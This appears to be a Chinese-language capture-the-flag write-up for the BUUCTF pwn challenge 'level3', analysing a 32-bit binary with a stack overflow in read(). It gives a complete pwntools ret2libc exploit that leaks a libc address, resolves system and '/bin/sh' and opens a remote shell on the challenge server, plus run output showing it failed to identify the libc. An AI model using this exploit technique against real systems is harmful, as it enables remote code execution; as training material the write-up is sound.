分析

  1. checksec
1
2
3
checksec --file=level3 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   69) Symbols	  No	0		1		level3
  1. file
1
2
file level3 
level3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=44a438e03b4d2c1abead90f748a4b5500b7a04c7, not stripped
  1. ida

main:

1
2
3
4
5
6
int __cdecl main(int argc, const char **argv, const char **envp)
{
  vulnerable_function();
  write(1, "Hello, World!\n", 0xEu);
  return 0;
}

vulnerable_function:

1
2
3
4
5
6
7
ssize_t vulnerable_function()
{
  char buf[136]; // [esp+0h] [ebp-88h] BYREF

  write(1, "Input:\n", 7u);
  return read(0, buf, 0x100u);
}

read函数这里溢出。

搜一下字符串,也没发现有bin/sh,system等,看来只能自己构造了。

利用思路也很清晰,就是搜索libc版本,最后溢出调用system函数,传参bin/sh

利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *
from LibcSearcher import *
r = remote('node5.buuoj.cn',25103)
elf = ELF('./level3')
main = 0x8048484
write_plt = elf.plt['write']
write_got = elf.got['write']
buf = b'a'*(0x88+4) + p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(write_got) + p32(4)
r.recvuntil('Input:\n')
r.sendline(buf)
write_addr = u32(r.recv(4))
libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
system = libc_base + libc.dump('system')
sh = libc_base + libc.dump('str_bin_sh')
buf = b'a'*(0x88+4) + p32(system) + p32(main) + p32(sh)
r.recvuntil('Input:\n')
r.sendline(buf)
r.interactive()

最后没打通,原因是没查到libc版本。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
pwn python3 level3.py 
[+] Opening connection to node5.buuoj.cn on port 25103: Done
[*] '/home/admin233/pwn/level3'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No
/home/admin233/pwn/level3.py:9: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  r.recvuntil('Input:\n')
[+] No libc satisfies constraints.
[*] Closed connection to node5.buuoj.cn port 25103

试了好多方法,网上基本上都说在云端搜索,理论可行,但是还是查不到,然后想尝试扩充本地libc数据库,且不说数据量大不大,直接get不下来,玩啥哦。

1
curl -X POST -H 'Content-Type: application/json' --data '{"symbols": ["strcat"]}' 'https://libc.rip/api/libc/libc6_2.27-3ubuntu1.2_amd64'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
{
  "buildid": "d3cf764b2f97ac3efe366ddd07ad902fb6928fd7",
  "download_url": "https://libc.rip/download/libc6_2.27-3ubuntu1.2_amd64.so",
  "id": "libc6_2.27-3ubuntu1.2_amd64",
  "libs_url": "http://archive.ubuntu.com/ubuntu/pool/main/g/glibc//libc6_2.27-3ubuntu1.2_amd64.deb",
  "md5": "35ef4ffc9c6ad7ffd1fd8c16f14dc766",
  "sha1": "a22321cd65f28f70cf321614fdfd22f36ecd0afe",
  "sha256": "f0ad9639b2530741046e06c96270b25da2339b6c15a7ae46de8fb021b3c4f529",
  "symbols": {
    "__libc_start_main_ret": "0x21b97",
    "dup2": "0x110ab0",
    "printf": "0x64f00",
    "puts": "0x80a30",
    "read": "0x110180",
    "str_bin_sh": "0x1b40fa",
    "strcat": "0x9d800",
    "system": "0x4f4e0",
    "write": "0x110250"
  },
  "symbols_url": "https://libc.rip/download/libc6_2.27-3ubuntu1.2_amd64.symbols"
}